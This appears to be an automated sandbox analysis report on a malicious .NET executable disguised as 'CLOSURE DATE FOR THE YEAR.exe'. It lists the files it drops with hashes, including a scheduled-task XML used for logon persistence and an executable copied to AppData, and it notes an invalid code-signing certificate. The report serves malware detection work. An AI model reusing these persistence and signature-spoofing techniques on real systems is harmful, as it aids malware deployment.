C:\ProgramData\Microsoft\Windows\WER\Temp\WERA61F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Dec 4 05:52:14 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	344354
Entropy (8bit):	3.883200849076175
Encrypted:	false
SSDEEP:	3072:7P4IUAFJWMrf4uEquyQLTg5ywZrz7D96RRVNnibYtKAy:7lrFJWkf4jy2Tg5y6rfArVIYtK
MD5:	A350164167A84E04882281C3F1E975D3
SHA1:	8E995D54AD193EDC3B697BEBAF3D3E7AEDCA4BE3
SHA-256:	BC8EAA2389A1B533E71A086E7CBE04A07616723EFF27BB559D446A65B18C5593
SHA-512:	023CAF690E5378053B02F94B230EB8BE8C3A8CF8FE63C61DCB1C2D5F02614712CBB67BC177085329F244C4344D8E874FD704EF3671FDC85AF657A337D1DDF74D
Malicious:	false
Preview:	MDMP..a..... .........Og.........................#..........<... -.......2..2j..........`.......8...........T............F..r...........\-..........H/..............................................................................eJ......./......GenuineIntel............T.......x.....Og............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAD3.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6402
Entropy (8bit):	3.7207691105799796
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbk66kv9YZrKQE/nXGg5aM4U089bP+msf9F9pGm:R6l7wVeJk66klYZ26cpr089bmmsf9FCm
MD5:	BBC0E884DB178317471ACB3F3324AF29
SHA1:	FAEAEE5461E770602A0A4ED78B33CF088B10408D
SHA-256:	13C7953E759FAA8EB27548FC65E227BFEC5201BF5490F1147811BA0B26A1BA8F
SHA-512:	8FA37E283D759224F097CF3575DA0B490A16D7840CDAAC6B25B13BA82A99D3D0BA1C7AD2A99287AB68A4D11ECDB6EF9098118F195CE4FDD4898D0246B1C1F7A7
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB22.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4755
Entropy (8bit):	4.4781577192689594
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZ7Jg77aI9LcVWpW8VYfOYm8M4Juh2mJO7FIzRlo+q8vc2mJOYRlrF8O:uIjfnI7Zck7ViJuhZtMKcZ5RlrGUyU3d
MD5:	23E3816B2D1109D591CD841DD875AB96
SHA1:	50000321FC37B8FC31230A4E37089355FD9E0044
SHA-256:	10FB541BFFECBB6E57FD46C15AD61C7F99EBBEFFEE4B112758C75F589AAF98DB
SHA-512:	1A0C2A5AB931A1CFBA6BABF117CBDF09BA2715B04416901BE746D52584A649CECE6FF08FB7B9E3AE85ACB009B4B23D1B03E781088D1DFF0AFBC139B39CA1E945
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="616134" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CLOSURE DATE FOR THE YEAR.exe.log

Download File

Process:	C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379633281639906
Encrypted:	false
SSDEEP:	48:BWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:BLHxvCsIfA2KRHmOugo1s
MD5:	8C2348BF92CE7E584CB478C92A7FDCC6
SHA1:	2FD972BE064D5DEB2DDC72F288F2FE9CBA200A1E
SHA-256:	082445C24C890503D54D015612AB11EE32C0C5D90ED6B25A17A9A1D012AEB482
SHA-512:	716AD0151B4F5F0328903ECB43066787A821DDB7C6AD513F56AC4DD96C41F198CF75E3FDCA09A2BB0FF3DBE8088C8B93E7E82FBB5239DE374B4C991B60126F74
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atmpdfqr.dqc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnwe1mub.2ih.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3j4rdkp.0z3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmovml5y.k2c.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_niez1oms.y1o.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzd2hhdo.m1b.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdrfzlhb.5ro.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yiw1niij.2tk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmpB774.tmp

Download File

Process:	C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.10988635659308
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxiv
MD5:	4746C4C07F3E8A1B14D7AFA27E57D2F0
SHA1:	9A6E35FA2A11E803F5D3DA0E74A306F2EF3E2D35
SHA-256:	D0C345C658891E7CA6935616E18BE2ADB6709C287D9B2E591E337EAC36806DE0
SHA-512:	FA98616F000F274252960AA9496A2A5996711EDEE1E82E329CCB82D6DBDBF39F706A429704FFC17924BA5415D52FF2F27EA2524F4943A762D80A5397C0304F83
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmpDA2F.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
File Type:	XML 1.0 document, ASCII text
Category:	modified
Size (bytes):	1576
Entropy (8bit):	5.10988635659308
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaIuxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxiv
MD5:	4746C4C07F3E8A1B14D7AFA27E57D2F0
SHA1:	9A6E35FA2A11E803F5D3DA0E74A306F2EF3E2D35
SHA-256:	D0C345C658891E7CA6935616E18BE2ADB6709C287D9B2E591E337EAC36806DE0
SHA-512:	FA98616F000F274252960AA9496A2A5996711EDEE1E82E329CCB82D6DBDBF39F706A429704FFC17924BA5415D52FF2F27EA2524F4943A762D80A5397C0304F83
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\188E93\31437F.lck

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe

Download File

Process:	C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	630792
Entropy (8bit):	7.684329132351894
Encrypted:	false
SSDEEP:	12288:+y4IR4R52J+XtWdNIyh1yxrgS1j/3XRaOzqiCShFgw64mLobm/IRskR:H4Iee7XthkxkS1jMi/KIt
MD5:	17BF29A93776B4F6BE948802F652E6A9
SHA1:	3E4727A68D9A4EE3DC3AF79408D60916777C1546
SHA-256:	527A3BC0B6281D3E65CB6B19801B1A9D748D5AC773FCB4655EDC783534450816
SHA-512:	DF9C87A3E89790924D63AFBD1DC339178D08B0F394DA16B728EE67D994337096FF969DE6224A49A4E6369A2329FE4DB9E5A89EB6C3F4F068E56B0365D02F2D0E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Og..............0......P......^7... ...@....@.. ....................................@..................................7..K....@...M...........j...6........................................................... ............... ..H............text...d.... ...................... ..`.rsrc....M...@...N..................@..@.reloc...............h..............@..B................@7......H.......0.................................................................:....0;...q..V.^".).8 L#DF...Z.H.i.E..L...\|D..r\..[...Z..{.WEt....=..9..CD.....z.l.V..`.......I.<mwR_.~....jr{.+K#C<.....v...PQ.'L.#.e.+h..8.C....ASV....../.>..@.UuZ.<.d.qOhb...$.R..y/...c...-...<i^....1.Nd.r..V.9.>..$0..G+<&<4..8.2,$...2Ol..h..25.4.~...+.....B.+B...C.yd..K...z.'.m..C\.....#.3..i.........c.....$.mT.A..+..4..c.g.O..G.Q...\6......a\|..q3..i.......0..........(....*...0..

C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	data
Category:	modified
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbq:4
MD5:	8CB7B7F28464C3FCBAE8A10C46204572
SHA1:	767FE80969EC2E67F54CC1B6D383C76E7859E2DE
SHA-256:	ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
SHA-512:	9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
Malicious:	false
Preview:	........................................user.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.684329132351894
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CLOSURE DATE FOR THE YEAR.exe
File size:	630'792 bytes
MD5:	17bf29a93776b4f6be948802f652e6a9
SHA1:	3e4727a68d9a4ee3dc3af79408d60916777c1546
SHA256:	527a3bc0b6281d3e65cb6b19801b1a9d748d5ac773fcb4655edc783534450816
SHA512:	df9c87a3e89790924d63afbd1dc339178d08b0f394da16b728ee67d994337096ff969de6224a49a4e6369a2329fe4db9e5a89eb6c3f4f068e56b0365d02f2d0e
SSDEEP:	12288:+y4IR4R52J+XtWdNIyh1yxrgS1j/3XRaOzqiCShFgw64mLobm/IRskR:H4Iee7XthkxkS1jMi/KIt
TLSH:	A4D4D09C3600F44FC943C5718EB4EDB4AA687DEA970382035AE71EEFF85D9569E041E2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Og..............0......P......^7... ...@....@.. ....................................@................................

File Icon


Icon Hash:	033424c4c199d839

Static PE Info

General

Entrypoint:	0x49375e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x674FADE2 [Wed Dec 4 01:18:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 00:00:00 08/11/2021 23:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
